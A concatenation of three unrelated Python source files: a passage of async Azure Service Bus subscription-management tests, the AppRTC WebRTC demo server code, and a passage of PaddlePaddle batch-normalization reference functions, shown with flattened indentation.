await clear_topics(mgmt_service)
topic_name = "dfjfj"
subscription_name = "kwqxc"
try:
topic_description = await mgmt_service.create_topic(topic_name)
subscription_description = await mgmt_service.create_subscription(topic_name, subscription_name)
# handle a null update properly.
with pytest.raises(TypeError):
await mgmt_service.update_subscription(topic_name, None)
# handle an invalid type update properly.
with pytest.raises(TypeError):
await mgmt_service.update_subscription(topic_name, Exception("test"))
# change the name to a topic that doesn't exist; should fail.
subscription_description.name = "iewdm"
with pytest.raises(HttpResponseError):
await mgmt_service.update_subscription(topic_name, subscription_description)
subscription_description.name = subscription_name
# change the name to a topic with an invalid name exist; should fail.
subscription_description.name = ''
with pytest.raises(msrest.exceptions.ValidationError):
await mgmt_service.update_subscription(topic_name, subscription_description)
subscription_description.name = topic_name
# change to a setting with an invalid value; should still fail.
subscription_description.lock_duration = datetime.timedelta(days=25)
with pytest.raises(HttpResponseError):
await mgmt_service.update_subscription(topic_name, subscription_description)
subscription_description.lock_duration = datetime.timedelta(minutes=5)
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_delete(self, servicebus_namespace_connection_string):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = 'test_topicgda'
subscription_name_1 = 'test_sub1da'
subscription_name_2 = 'test_sub2gcv'
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(topic_name, subscription_name_1)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 1
await mgmt_service.create_subscription(topic_name, subscription_name_2)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 2
description = await mgmt_service.get_subscription(topic_name, subscription_name_1)
await mgmt_service.delete_subscription(topic_name, description.name)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 1 and subscriptions[0].name == subscription_name_2
await mgmt_service.delete_subscription(topic_name, subscription_name_2)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 0
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_list(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = 'lkoqxc'
subscription_name_1 = 'testsub1'
subscription_name_2 = 'testsub2'
await mgmt_service.create_topic(topic_name)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 0
await mgmt_service.create_subscription(topic_name, subscription_name_1)
await mgmt_service.create_subscription(topic_name, subscription_name_2)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 2
assert subscriptions[0].name == subscription_name_1
assert subscriptions[1].name == subscription_name_2
await mgmt_service.delete_subscription(topic_name, subscription_name_1)
await mgmt_service.delete_subscription(topic_name, subscription_name_2)
subscriptions = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
assert len(subscriptions) == 0
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_list_runtime_properties(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = 'dkoamv'
subscription_name = 'cxqplc'
await mgmt_service.create_topic(topic_name)
subs = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
subs_infos = await async_pageable_to_list(mgmt_service.list_subscriptions_runtime_properties(topic_name))
assert len(subs) == len(subs_infos) == 0
await mgmt_service.create_subscription(topic_name, subscription_name)
subs = await async_pageable_to_list(mgmt_service.list_subscriptions(topic_name))
subs_infos = await async_pageable_to_list(mgmt_service.list_subscriptions_runtime_properties(topic_name))
assert len(subs) == 1 and len(subs_infos) == 1
assert subs[0].name == subs_infos[0].name == subscription_name
info = subs_infos[0]
assert info.accessed_at_utc is not None
assert info.updated_at_utc is not None
assert info.created_at_utc is not None
assert info.total_message_count == 0
assert info.active_message_count == 0
assert info.dead_letter_message_count == 0
assert info.transfer_dead_letter_message_count == 0
assert info.transfer_message_count == 0
await mgmt_service.delete_subscription(topic_name, subscription_name)
subs_infos = await async_pageable_to_list(mgmt_service.list_subscriptions_runtime_properties(topic_name))
assert len(subs_infos) == 0
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_get_runtime_properties_basic(self, servicebus_namespace_connection_string):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = 'dcvxqa'
subscription_name = 'xvazzag'
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(topic_name, subscription_name)
sub_runtime_properties = await mgmt_service.get_subscription_runtime_properties(topic_name, subscription_name)
assert sub_runtime_properties
assert sub_runtime_properties.name == subscription_name
assert sub_runtime_properties.created_at_utc is not None
assert sub_runtime_properties.accessed_at_utc is not None
assert sub_runtime_properties.updated_at_utc is not None
assert sub_runtime_properties.total_message_count == 0
assert sub_runtime_properties.active_message_count == 0
assert sub_runtime_properties.dead_letter_message_count == 0
assert sub_runtime_properties.transfer_dead_letter_message_count == 0
assert sub_runtime_properties.transfer_message_count == 0
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_mgmt_subscription_async_update_dict_success(self, servicebus_namespace_connection_string, servicebus_namespace, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "fjrui"
subscription_name = "eqkovc"
try:
topic_description = await mgmt_service.create_topic(topic_name)
subscription_description = await mgmt_service.create_subscription(topic_description.name, subscription_name)
subscription_description_dict = dict(subscription_description)
# Try updating one setting.
subscription_description_dict["lock_duration"] = datetime.timedelta(minutes=2)
await mgmt_service.update_subscription(topic_description.name, subscription_description_dict)
subscription_description = await mgmt_service.get_subscription(topic_name, subscription_name)
assert subscription_description.lock_duration == datetime.timedelta(minutes=2)
# Now try updating all settings.
subscription_description_dict = dict(subscription_description)
subscription_description_dict["auto_delete_on_idle"] = datetime.timedelta(minutes=10)
subscription_description_dict["dead_lettering_on_message_expiration"] = True
subscription_description_dict["default_message_time_to_live"] = datetime.timedelta(minutes=11)
subscription_description_dict["lock_duration"] = datetime.timedelta(seconds=12)
subscription_description_dict["max_delivery_count"] = 14
# topic_description.enable_partitioning = True # Cannot be changed after creation
# topic_description.requires_session = True # Cannot be changed after creation
await mgmt_service.update_subscription(topic_description.name, subscription_description_dict)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=10)
assert subscription_description.dead_lettering_on_message_expiration == True
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=11)
assert subscription_description.max_delivery_count == 14
assert subscription_description.lock_duration == datetime.timedelta(seconds=12)
# assert topic_description.enable_partitioning == True
# assert topic_description.requires_session == True
# Finally, test forward_to (separately, as it changes auto_delete_on_idle when you enable it.)
subscription_description_dict = dict(subscription_description)
subscription_description_dict["forward_to"] = "sb://{}.servicebus.windows.net/{}".format(servicebus_namespace.name, topic_name)
subscription_description_dict["forward_dead_lettered_messages_to"] = "sb://{}.servicebus.windows.net/{}".format(servicebus_namespace.name, topic_name)
await mgmt_service.update_subscription(topic_description.name, subscription_description_dict)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
# Note: We endswith to avoid the fact that the servicebus_namespace_name is replacered locally but not in the properties bag, and still test this.
assert subscription_description.forward_to.endswith(".servicebus.windows.net/{}".format(topic_name))
assert subscription_description.forward_dead_lettered_messages_to.endswith(".servicebus.windows.net/{}".format(topic_name))
# updating all settings with keyword arguments.
await mgmt_service.update_subscription(
topic_description.name,
dict(subscription_description),
auto_delete_on_idle=datetime.timedelta(minutes=15),
dead_lettering_on_message_expiration=False,
default_message_time_to_live=datetime.timedelta(minutes=16),
lock_duration=datetime.timedelta(seconds=17),
max_delivery_count=15,
forward_to=None,
forward_dead_lettered_messages_to=None
)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=15)
assert subscription_description.dead_lettering_on_message_expiration == False
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=16)
assert subscription_description.max_delivery_count == 15
assert subscription_description.lock_duration == datetime.timedelta(seconds=17)
assert subscription_description.forward_to == None
assert subscription_description.forward_dead_lettered_messages_to == None
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
await mgmt_service.close()
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_mgmt_subscription_async_update_dict_error(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "fjrui"
subscription_name = "eqkovc"
try:
topic_description = await mgmt_service.create_topic(topic_name)
subscription_description = await mgmt_service.create_subscription(topic_description.name, subscription_name)
# send in subscription dict without non-name keyword args
subscription_description_only_name = {"name": topic_name}
with pytest.raises(TypeError):
await mgmt_service.update_subscription(topic_description.name, subscription_description_only_name)
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
|
|
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
"""WebRTC Demo
This module demonstrates the WebRTC API by implementing a simple video chat app.
"""
import cgi
import json
import logging
import os
import random
import threading
import jinja2
import webapp2
from google.appengine.api import memcache
from google.appengine.api import urlfetch
import analytics
import analytics_page
import compute_page
import constants
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
def generate_random(length):
word = ''
for _ in range(length):
word += random.choice('0123456789')
return word
# HD is on by default for desktop Chrome, but not Android or Firefox (yet)
def get_hd_default(user_agent):
if 'Android' in user_agent or not 'Chrome' in user_agent:
return 'false'
return 'true'
# iceServers will be filled in by the TURN HTTP request.
def make_pc_config(ice_transports):
config = {
'iceServers': [],
'bundlePolicy': 'max-bundle',
'rtcpMuxPolicy': 'require'
};
if ice_transports:
config['iceTransports'] = ice_transports
return config
def add_media_track_constraint(track_constraints, constraint_string):
tokens = constraint_string.split(':')
mandatory = True
if len(tokens) == 2:
# If specified, e.g. mandatory:minHeight=720, set mandatory appropriately.
mandatory = (tokens[0] == 'mandatory')
else:
# Otherwise, default to mandatory, except for goog constraints, which
# won't work in other browsers.
mandatory = not tokens[0].startswith('goog')
tokens = tokens[-1].split('=')
if len(tokens) == 2:
if mandatory:
track_constraints['mandatory'][tokens[0]] = tokens[1]
else:
track_constraints['optional'].append({tokens[0]: tokens[1]})
else:
logging.error('Ignoring malformed constraint: ' + constraint_string)
def make_media_track_constraints(constraints_string):
if not constraints_string or constraints_string.lower() == 'true':
track_constraints = True
elif constraints_string.lower() == 'false':
track_constraints = False
else:
track_constraints = {'mandatory': {}, 'optional': []}
for constraint_string in constraints_string.split(','):
add_media_track_constraint(track_constraints, constraint_string)
return track_constraints
def make_media_stream_constraints(audio, video, firefox_fake_device):
stream_constraints = (
{'audio': make_media_track_constraints(audio),
'video': make_media_track_constraints(video)})
if firefox_fake_device:
stream_constraints['fake'] = True
logging.info('Applying media constraints: ' + str(stream_constraints))
return stream_constraints
def maybe_add_constraint(constraints, param, constraint):
if (param.lower() == 'true'):
constraints['optional'].append({constraint: True})
elif (param.lower() == 'false'):
constraints['optional'].append({constraint: False})
return constraints
def make_pc_constraints(dtls, dscp, ipv6):
constraints = {'optional': []};
maybe_add_constraint(constraints, dtls, 'DtlsSrtpKeyAgreement')
maybe_add_constraint(constraints, dscp, 'googDscp')
maybe_add_constraint(constraints, ipv6, 'googIPv6')
return constraints
def append_url_arguments(request, link):
arguments = request.arguments()
if len(arguments) == 0:
return link
link += ('?' + cgi.escape(arguments[0], True) + '=' +
cgi.escape(request.get(arguments[0]), True))
for argument in arguments[1:]:
link += ('&' + cgi.escape(argument, True) + '=' +
cgi.escape(request.get(argument), True))
return link
def get_wss_parameters(request):
wss_host_port_pair = request.get('wshpp')
wss_tls = request.get('wstls')
if not wss_host_port_pair:
# Attempt to get a wss server from the status provided by prober,
# if that fails, use fallback value.
memcache_client = memcache.Client()
wss_active_host = memcache_client.get(constants.WSS_HOST_ACTIVE_HOST_KEY)
if wss_active_host in constants.WSS_HOST_PORT_PAIRS:
wss_host_port_pair = wss_active_host
else:
logging.warning(
'Invalid or no value returned from memcache, using fallback: '
+ json.dumps(wss_active_host))
wss_host_port_pair = constants.WSS_HOST_PORT_PAIRS[0]
if wss_tls and wss_tls == 'false':
wss_url = 'ws://' + wss_host_port_pair + '/ws'
wss_post_url = 'http://' + wss_host_port_pair
else:
wss_url = 'wss://' + wss_host_port_pair + '/ws'
wss_post_url = 'https://' + wss_host_port_pair
return (wss_url, wss_post_url)
def get_version_info():
try:
path = os.path.join(os.path.dirname(__file__), 'version_info.json')
f = open(path)
if f is not None:
try:
return json.load(f)
except ValueError as e:
logging.warning('version_info.json cannot be decoded: ' + str(e))
except IOError as e:
logging.info('version_info.json cannot be opened: ' + str(e))
return None
def get_callstats_params():
try:
path = os.path.join(os.path.dirname(__file__), 'callstats_params.json')
f = open(path)
if f is not None:
try:
return json.load(f)
except ValueError as e:
logging.warning('callstats_params.json cannot be decoded: ' + str(e))
except IOError as e:
logging.info('callstats_params.json cannot be opened: ' + str(e))
return None
# Returns appropriate room parameters based on query parameters in the request.
# TODO(tkchin): move query parameter parsing to JS code.
def get_room_parameters(request, room_id, client_id, is_initiator):
error_messages = []
warning_messages = []
# Get the base url without arguments.
base_url = request.path_url
user_agent = request.headers['User-Agent']
# HTML or JSON.
response_type = request.get('t')
# Which ICE candidates to allow. This is useful for forcing a call to run
# over TURN, by setting it=relay.
ice_transports = request.get('it')
# Which ICE server transport= to allow (i.e., only TURN URLs with
# transport=<tt> will be used). This is useful for forcing a session to use
# TURN/TCP, by setting it=relay&tt=tcp.
ice_server_transports = request.get('tt')
# A HTTP server that will be used to find the right ICE servers to use, as
# described in http://tools.ietf.org/html/draft-uberti-rtcweb-turn-rest-00.
ice_server_base_url = request.get('ts', default_value =
constants.ICE_SERVER_BASE_URL)
# Use "audio" and "video" to set the media stream constraints. Defined here:
# http://goo.gl/V7cZg
#
# "true" and "false" are recognized and interpreted as bools, for example:
# "?audio=true&video=false" (Start an audio-only call.)
# "?audio=false" (Start a video-only call.)
# If unspecified, the stream constraint defaults to True.
#
# To specify media track constraints, pass in a comma-separated list of
# key/value pairs, separated by a "=". Examples:
# "?audio=googEchoCancellation=false,googAutoGainControl=true"
# (Disable echo cancellation and enable gain control.)
#
# "?video=minWidth=1280,minHeight=720,googNoiseReduction=true"
# (Set the minimum resolution to 1280x720 and enable noise reduction.)
#
# Keys starting with "goog" will be added to the "optional" key; all others
# will be added to the "mandatory" key.
# To override this default behavior, add a "mandatory" or "optional" prefix
# to each key, e.g.
# "?video=optional:minWidth=1280,optional:minHeight=720,
# mandatory:googNoiseReduction=true"
# (Try to do 1280x720, but be willing to live with less; enable
# noise reduction or die trying.)
#
# The audio keys are defined here: talk/app/webrtc/localaudiosource.cc
# The video keys are defined here: talk/app/webrtc/videosource.cc
audio = request.get('audio')
video = request.get('video')
# Pass firefox_fake_device=1 to pass fake: true in the media constraints,
# which will make Firefox use its built-in fake device.
firefox_fake_device = request.get('firefox_fake_device')
# The hd parameter is a shorthand to determine whether to open the
# camera at 720p. If no value is provided, use a platform-specific default.
# When defaulting to HD, use optional constraints, in case the camera
# doesn't actually support HD modes.
hd = request.get('hd').lower()
if hd and video:
message = 'The "hd" parameter has overridden video=' + video
logging.warning(message)
# HTML template is UTF-8, make sure the string is UTF-8 as well.
warning_messages.append(message.encode('utf-8'))
if hd == 'true':
video = 'mandatory:minWidth=1280,mandatory:minHeight=720'
elif not hd and not video and get_hd_default(user_agent) == 'true':
video = 'optional:minWidth=1280,optional:minHeight=720'
if request.get('minre') or request.get('maxre'):
message = ('The "minre" and "maxre" parameters are no longer ' +
'supported. Use "video" instead.')
logging.warning(message)
# HTML template is UTF-8, make sure the string is UTF-8 as well.
warning_messages.append(message.encode('utf-8'))
# Options for controlling various networking features.
dtls = request.get('dtls')
dscp = request.get('dscp')
ipv6 = request.get('ipv6')
debug = request.get('debug')
if debug == 'loopback':
# Set dtls to false as DTLS does not work for loopback.
dtls = 'false'
include_loopback_js = '<script src="/js/loopback.js"></script>'
else:
include_loopback_js = ''
# TODO(tkchin): We want to provide a ICE request url on the initial get,
# but we don't provide client_id until a join. For now just generate
# a random id, but we should make this better.
username = client_id if client_id is not None else generate_random(9)
if len(ice_server_base_url) > 0:
ice_server_url = constants.ICE_SERVER_URL_TEMPLATE % \
(ice_server_base_url, constants.ICE_SERVER_API_KEY)
else:
ice_server_base_url = ''
turn_url = constants.TURN_URL_TEMPLATE % \
(constants.TURN_BASE_URL, username, constants.CEOD_KEY)
pc_config = make_pc_config(ice_transports)
pc_constraints = make_pc_constraints(dtls, dscp, ipv6)
offer_options = {};
media_constraints = make_media_stream_constraints(audio, video,
firefox_fake_device)
wss_url, wss_post_url = get_wss_parameters(request)
bypass_join_confirmation = 'BYPASS_JOIN_CONFIRMATION' in os.environ and \
os.environ['BYPASS_JOIN_CONFIRMATION'] == 'True'
params = {
'error_messages': error_messages,
'warning_messages': warning_messages,
'is_loopback' : json.dumps(debug == 'loopback'),
'pc_config': json.dumps(pc_config),
'pc_constraints': json.dumps(pc_constraints),
'offer_options': json.dumps(offer_options),
'media_constraints': json.dumps(media_constraints),
'turn_url': turn_url,
'ice_server_url': ice_server_url,
'ice_server_transports': ice_server_transports,
'include_loopback_js' : include_loopback_js,
'wss_url': wss_url,
'wss_post_url': wss_post_url,
'bypass_join_confirmation': json.dumps(bypass_join_confirmation),
'version_info': json.dumps(get_version_info()),
'callstats_params': json.dumps(constants.CALLSTATS_PARAMS)
}
if room_id is not None:
room_link = request.host_url + '/r/' + room_id
room_link = append_url_arguments(request, room_link)
params['room_id'] = room_id
params['room_link'] = room_link
if client_id is not None:
params['client_id'] = client_id
if is_initiator is not None:
params['is_initiator'] = json.dumps(is_initiator)
return params
# For now we have (room_id, client_id) pairs are 'unique' but client_ids are
# not. Uniqueness is not enforced however and bad things may happen if RNG
# generates non-unique numbers. We also have a special loopback client id.
# TODO(tkchin): Generate room/client IDs in a unique way while handling
# loopback scenario correctly.
class Client:
def __init__(self, is_initiator):
self.is_initiator = is_initiator
self.messages = []
def add_message(self, msg):
self.messages.append(msg)
def clear_messages(self):
self.messages = []
def set_initiator(self, initiator):
self.is_initiator = initiator
def __str__(self):
return '{%r, %d}' % (self.is_initiator, len(self.messages))
class Room:
def __init__(self):
self.clients = {}
def add_client(self, client_id, client):
self.clients[client_id] = client
def remove_client(self, client_id):
del self.clients[client_id]
def get_occupancy(self):
return len(self.clients)
def has_client(self, client_id):
return client_id in self.clients
def get_client(self, client_id):
return self.clients[client_id]
def get_other_client(self, client_id):
for key, client in self.clients.items():
if key is not client_id:
return client
return None
def __str__(self):
return str(self.clients.keys())
def get_memcache_key_for_room(host, room_id):
return '%s/%s' % (host, room_id)
def add_client_to_room(request, room_id, client_id, is_loopback):
key = get_memcache_key_for_room(request.host_url, room_id)
memcache_client = memcache.Client()
error = None
retries = 0
room = None
# Compare and set retry loop.
while True:
is_initiator = None
messages = []
room_state = ''
room = memcache_client.gets(key)
if room is None:
# 'set' and another 'gets' are needed for CAS to work.
if not memcache_client.set(key, Room()):
logging.warning('memcache.Client.set failed for key ' + key)
error = constants.RESPONSE_ERROR
break
room = memcache_client.gets(key)
occupancy = room.get_occupancy()
if occupancy >= 2:
error = constants.RESPONSE_ROOM_FULL
break
if room.has_client(client_id):
error = constants.RESPONSE_DUPLICATE_CLIENT
break
if occupancy == 0:
is_initiator = True
room.add_client(client_id, Client(is_initiator))
if is_loopback:
room.add_client(constants.LOOPBACK_CLIENT_ID, Client(False))
else:
is_initiator = False
other_client = room.get_other_client(client_id)
messages = other_client.messages
room.add_client(client_id, Client(is_initiator))
other_client.clear_messages()
if memcache_client.cas(key, room, constants.ROOM_MEMCACHE_EXPIRATION_SEC):
logging.info('Added client %s in room %s, retries = %d' \
%(client_id, room_id, retries))
if room.get_occupancy() == 2:
analytics.report_event(analytics.EventType.ROOM_SIZE_2,
room_id,
host=request.host)
success = True
break
else:
retries = retries + 1
return {'error': error, 'is_initiator': is_initiator,
'messages': messages, 'room_state': str(room)}
def remove_client_from_room(host, room_id, client_id):
key = get_memcache_key_for_room(host, room_id)
memcache_client = memcache.Client()
retries = 0
# Compare and set retry loop.
while True:
room = memcache_client.gets(key)
if room is None:
logging.warning('remove_client_from_room: Unknown room ' + room_id)
return {'error': constants.RESPONSE_UNKNOWN_ROOM, 'room_state': None}
if not room.has_client(client_id):
logging.warning('remove_client_from_room: Unknown client ' + client_id + \
' for room ' + room_id)
return {'error': constants.RESPONSE_UNKNOWN_CLIENT, 'room_state': None}
room.remove_client(client_id)
if room.has_client(constants.LOOPBACK_CLIENT_ID):
room.remove_client(constants.LOOPBACK_CLIENT_ID)
if room.get_occupancy() > 0:
room.get_other_client(client_id).set_initiator(True)
else:
room = None
if memcache_client.cas(key, room, constants.ROOM_MEMCACHE_EXPIRATION_SEC):
logging.info('Removed client %s from room %s, retries=%d' \
%(client_id, room_id, retries))
return {'error': None, 'room_state': str(room)}
retries = retries + 1
def save_message_from_client(host, room_id, client_id, message):
text = None
try:
text = message.encode(encoding='utf-8', errors='strict')
except Exception as e:
return {'error': constants.RESPONSE_ERROR, 'saved': False}
key = get_memcache_key_for_room(host, room_id)
memcache_client = memcache.Client()
retries = 0
# Compare and set retry loop.
while True:
room = memcache_client.gets(key)
if room is None:
logging.warning('Unknown room: ' + room_id)
return {'error': constants.RESPONSE_UNKNOWN_ROOM, 'saved': False}
if not room.has_client(client_id):
logging.warning('Unknown client: ' + client_id)
return {'error': constants.RESPONSE_UNKNOWN_CLIENT, 'saved': False}
if room.get_occupancy() > 1:
return {'error': None, 'saved': False}
client = room.get_client(client_id)
client.add_message(text)
if memcache_client.cas(key, room, constants.ROOM_MEMCACHE_EXPIRATION_SEC):
logging.info('Saved message for client %s:%s in room %s, retries=%d' \
%(client_id, str(client), room_id, retries))
return {'error': None, 'saved': True}
retries = retries + 1
class LeavePage(webapp2.RequestHandler):
def post(self, room_id, client_id):
result = remove_client_from_room(
self.request.host_url, room_id, client_id)
if result['error'] is None:
logging.info('Room ' + room_id + ' has state ' + result['room_state'])
class MessagePage(webapp2.RequestHandler):
def write_response(self, result):
content = json.dumps({ 'result' : result })
self.response.write(content)
def send_message_to_collider(self, room_id, client_id, message):
logging.info('Forwarding message to collider for room ' + room_id +
' client ' + client_id)
wss_url, wss_post_url = get_wss_parameters(self.request)
url = wss_post_url + '/' + room_id + '/' + client_id
result = urlfetch.fetch(url=url,
payload=message,
method=urlfetch.POST)
if result.status_code != 200:
logging.error(
'Failed to send message to collider: %d' % (result.status_code))
# TODO(tkchin): better error handling.
self.error(500)
return
self.write_response(constants.RESPONSE_SUCCESS)
def post(self, room_id, client_id):
message_json = self.request.body
result = save_message_from_client(
self.request.host_url, room_id, client_id, message_json)
if result['error'] is not None:
self.write_response(result['error'])
return
if not result['saved']:
# Other client joined, forward to collider. Do this outside the lock.
# Note: this may fail in local dev server due to not having the right
# certificate file locally for SSL validation.
# Note: loopback scenario follows this code path.
# TODO(tkchin): consider async fetch here.
self.send_message_to_collider(room_id, client_id, message_json)
else:
self.write_response(constants.RESPONSE_SUCCESS)
class JoinPage(webapp2.RequestHandler):
def write_response(self, result, params, messages):
# TODO(tkchin): Clean up response format. For simplicity put everything in
# params for now.
params['messages'] = messages
self.response.write(json.dumps({
'result': result,
'params': params
}))
def write_room_parameters(self, room_id, client_id, messages, is_initiator):
params = get_room_parameters(self.request, room_id, client_id, is_initiator)
self.write_response('SUCCESS', params, messages)
def post(self, room_id):
client_id = generate_random(8)
is_loopback = self.request.get('debug') == 'loopback'
result = add_client_to_room(self.request, room_id, client_id, is_loopback)
if result['error'] is not None:
logging.info('Error adding client to room: ' + result['error'] + \
', room_state=' + result['room_state'])
self.write_response(result['error'], {}, [])
return
self.write_room_parameters(
room_id, client_id, result['messages'], result['is_initiator'])
logging.info('User ' + client_id + ' joined room ' + room_id)
logging.info('Room ' + room_id + ' has state ' + result['room_state'])
class MainPage(webapp2.RequestHandler):
def write_response(self, target_page, params={}):
template = jinja_environment.get_template(target_page)
content = template.render(params)
self.response.out.write(content)
def get(self):
"""Renders index.html."""
if self.request.headers['Host'] == 'apprtc.net':
webapp2.redirect('https://www.apprtc.net', permanent=True)
# Parse out parameters from request.
params = get_room_parameters(self.request, None, None, None)
# room_id/room_link will not be included in the returned parameters
# so the client will show the landing page for room selection.
self.write_response('index_template.html', params)
class RoomPage(webapp2.RequestHandler):
def write_response(self, target_page, params={}):
template = jinja_environment.get_template(target_page)
content = template.render(params)
self.response.out.write(content)
def get(self, room_id):
"""Renders index.html or full.html."""
# Check if room is full.
room = memcache.get(
get_memcache_key_for_room(self.request.host_url, room_id))
if room is not None:
logging.info('Room ' + room_id + ' has state ' + str(room))
if room.get_occupancy() >= 2:
logging.info('Room ' + room_id + ' is full')
self.write_response('full_template.html')
return
# Parse out room parameters from request.
params = get_room_parameters(self.request, room_id, None, None)
# room_id/room_link will be included in the returned parameters
# so the client will launch the requested room.
self.write_response('index_template.html', params)
class ParamsPage(webapp2.RequestHandler):
def get(self):
# Return room independent room parameters.
params = get_room_parameters(self.request, None, None, None)
self.response.write(json.dumps(params))
app = webapp2.WSGIApplication([
('/', MainPage),
('/a/', analytics_page.AnalyticsPage),
('/compute/(\w+)/(\S+)/(\S+)', compute_page.ComputePage),
('/join/([a-zA-Z0-9-_]+)', JoinPage),
('/leave/([a-zA-Z0-9-_]+)/([a-zA-Z0-9-_]+)', LeavePage),
('/message/([a-zA-Z0-9-_]+)/([a-zA-Z0-9-_]+)', MessagePage),
('/params', ParamsPage),
('/r/([a-zA-Z0-9-_]+)', RoomPage),
], debug=True)
|
|
import unittest
import numpy as np
from op_test import OpTest
import paddle.v2.framework.core as core
from paddle.v2.framework.op import Operator
def grad_var_name(var_name):
return var_name + "@GRAD"
def get_backward_op(scope, op, no_grad_set):
backward_op = core.Operator.backward(op, no_grad_set)
for input in backward_op.input_vars():
var = scope.var(input)
var.get_tensor()
for output in backward_op.output_vars():
var = scope.var(output)
var.get_tensor()
return backward_op
def _reference_training(x, scale, offset, epsilon, data_format):
if data_format == "NCHW":
n, c, h, w = x.shape
x_square = x * x
x_square_sum = np.sum(x_square, (0, 2, 3))
x_sum = np.sum(x, axis=(0, 2, 3))
element_count = np.size(x) / int(np.shape(x)[1])
mean = x_sum / element_count
var = x_square_sum / element_count - mean * mean
mean_tile = np.reshape(mean, (1, c, 1, 1))
mean_tile = np.tile(mean_tile, (n, 1, h, w))
var_tile = np.reshape(var, (1, c, 1, 1))
var_tile = np.tile(var_tile, (n, 1, h, w))
normalized = (x - mean_tile) / np.sqrt(var_tile + epsilon)
scale_tile = np.reshape(scale, (1, c, 1, 1))
scale_tile = np.tile(scale_tile, (n, 1, h, w))
offset_tile = np.reshape(offset, (1, c, 1, 1))
offset_tile = np.reshape(offset_tile, (1, c, 1, 1))
y = normalized * scale_tile + offset_tile
return y, mean, var
elif data_format == "NHWC":
x_square = x * x
x_square_sum = np.sum(x_square, (0, 1, 2))
x_sum = np.sum(x, axis=(0, 1, 2))
element_count = np.size(x) / int(np.shape(x)[-1])
mean = x_sum / element_count
var = x_square_sum / element_count - mean * mean
normalized = (x - mean) / np.sqrt(var + epsilon)
return (normalized * scale + offset), mean, var
else:
raise ValueError("Unknown data order.")
def _reference_grad(x, grad_y, scale, mean, var, epsilon, data_format):
# Use the following formulas to calculate gradients:
# grad_scale =
# sum(grad_y * (x - mean)) * rsqrt(var + epsilon)
#
# grad_offset = sum(output_y)
#
# grad_x =
# 1/N * scale * rsqrt(var + epsilon) * (N * grad_y - sum(grad_y) -
# (x - mean) * sum(grad_y * (x - mean)) / (var + epsilon))
# transfer from (N, C, H, W) to (N, H, W, C) to simplify computation
if data_format == "NCHW":
x = np.transpose(x, (0, 2, 3, 1))
grad_y = np.transpose(grad_y, (0, 2, 3, 1))
# raise ValueError("data_format must be NHWC, got %s." % data_format)
grad_x = scale * (grad_y - np.mean(
grad_y, axis=(0, 1, 2)) - (x - mean) * np.mean(
grad_y * (x - mean), axis=(0, 1, 2)) /
(var + epsilon)) / np.sqrt(var + epsilon)
grad_scale = np.sum(grad_y * (x - mean) / np.sqrt(var + epsilon),
axis=(0, 1, 2))
grad_offset = np.sum(grad_y, axis=(0, 1, 2))
# transfer back to N, C, H, W
if data_format == "NCHW":
grad_x = np.transpose(grad_x, (0, 3, 1, 2))
x = np.transpose(x, (0, 3, 1, 2))
grad_y = np.transpose(grad_y, (0, 3, 1, 2))
